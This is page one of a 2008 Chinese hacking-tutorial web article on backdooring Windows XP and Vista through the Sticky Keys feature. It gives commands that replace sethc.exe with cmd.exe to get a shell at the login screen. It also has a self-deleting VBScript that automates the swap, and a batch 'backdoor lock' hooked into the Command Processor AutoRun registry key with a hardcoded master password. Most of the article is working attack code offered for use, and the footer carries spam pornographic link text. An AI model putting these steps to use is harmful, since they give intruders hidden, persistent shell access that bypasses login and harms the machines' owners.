當(dāng)前位置 : 首頁(yè)>軟件學(xué)院>網(wǎng)絡(luò)技術(shù)>黑客攻防>正文

利用粘滯鍵打造入侵Vista超酷后門

http://www.yibo1263.com　2008-12-11 7:57:24 　來(lái)源:東北IT網(wǎng) 　編輯:葉子

什么是粘滯鍵？

當(dāng)你在Windows操作系統(tǒng)里面連續(xù)按下5次Shift鍵之后，你看看出來(lái)了什么？

在windows 2000/xp/Vista下，按shift鍵5次，可以打開(kāi)粘置，會(huì)運(yùn)行sethc.exe，而且，在登錄界面里也可以打開(kāi)。這就讓人聯(lián)想到WINDOWS的屏保，將程序替換成cmd.exe后，就可以打開(kāi)shell了。

一、具體的替換方法：

XP系統(tǒng)：
將安裝源光盤彈出（或?qū)⒂脖P上的安裝目錄改名)
cd %widnir%\system32\dllcache
ren sethc.exe *.ex~
cd %widnir%\system32
copy /y cmd.exe sethc.exe

Vista系統(tǒng)：
takeown /f c:\windows\system32\sethc.exe
cacls c:\windows\system32\sethc.exe /G administrator:F
Vista之家（www.vista123.com）備注：上兩步為獲得權(quán)限的命令，你也可以通過(guò)Vista優(yōu)化大師獲得右鍵菜單的提升權(quán)限的功能，然后在sethc.exe文件上面右鍵直接提升權(quán)限。
然后按XP方法替換文件

在登錄界面按5此SHIFT，出來(lái)cmd shell，然后……

二、后門擴(kuò)展：

Dim obj, success
Set obj = CreateObject("WScript.Shell")
success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe", 0, True)
success = obj.run("cmd /c echo y　 cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F", 0, True)
success = obj.run("cmd /c copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe", 0, True)
success = obj.run("cmd /c copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe", 0, True)
success = obj.run("cmd /c del %SystemRoot%\system32\sethc.exe", 0, True)
success = obj.run("cmd /c ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)

第二句最有意思了.嘿嘿..自動(dòng)應(yīng)答....以前就遇到過(guò)類似的問(wèn)題

再更新，加個(gè)自刪除、簡(jiǎn)化代碼：
On Error Resume Next
Dim obj, success
Set obj = CreateObject("WScript.Shell")
success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y　 cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F© %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe© %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exedel %SystemRoot%\system32\sethc.exeren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)

三、后門鎖擴(kuò)展：

allyesno注：可以采用cmd 鎖來(lái)進(jìn)行cmdshell的密碼驗(yàn)證嘿嘿。。。

用下面的后門鎖的方法是把代碼保存為bdlock.bat

然后修改注冊(cè)表位置即可

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor]
"AutoRun"="bdlock.bat"

@Echo Off
title 后門登陸驗(yàn)證
color a
cls
set temprandom=%RANDOM%
echo 請(qǐng)輸入驗(yàn)證碼:%temprandom%
set/p check=
if "%check%"=="%temprandom%%temprandom%" goto passcheck
if "%check%"=="%temprandom%" (
rem 后門服務(wù)器驗(yàn)證
rem 如果沒(méi)有后門驗(yàn)證服務(wù)器請(qǐng)rem注釋掉下一行代碼
if exist \192.168.8.8\backdoor$\pass goto passcheck
)
echo 驗(yàn)證失敗
pause
exit
:passcheck
echo 驗(yàn)證成功
If "%passcmdlock%"==http://www.6655.com/ Goto endx
Set passcmdlock=http://www.6655.com/
:allyesno
Set Errorlevel=>nul
Echo 請(qǐng)輸入驗(yàn)證密碼？
Set password=allyesno Is a pig>nul
Set/p password=
rem 萬(wàn)能密碼
if "%password%"=="allyesno is a sb" goto endx
If %time:~1,1%==0 Set timechange=a
If %time:~1,1%==1 Set timechange=b
If %time:~1,1%==2 Set timechange=c
If %time:~1,1%==3 Set timechange=d
If %time:~1,1%==4 Set timechange=e

本新聞共2頁(yè),當(dāng)前在第1頁(yè) 1 2

【收藏】【打印】【進(jìn)入論壇】

相關(guān)文章：

·找回圖標(biāo)去提速 Vista解決案例兩則

·Vista系統(tǒng)下有效控制網(wǎng)絡(luò)下載

·Vista綁定網(wǎng)卡MAC地址防范ARP

·Win 7和Vista系統(tǒng)多余更新提示清除

·Vista使用4GB以上內(nèi)存不穩(wěn)定的解決辦法

·Vista系統(tǒng)刪除多余文件的隱蔽方法

·刪除隱藏在Vista系統(tǒng)服務(wù)中的病毒

·從Vista到Win 7防火墻操作差異比較

·Vista中快速卸載刪除多系統(tǒng)中的Win7

·Vista瀏覽網(wǎng)頁(yè)時(shí)無(wú)法顯示的解決

·Vista 下文件和打印共享的技巧

亚洲AV无码乱码在线观看不卡|最新大伊香蕉精品视频在线|亚洲不卡av一区二区|国产美女无遮挡免费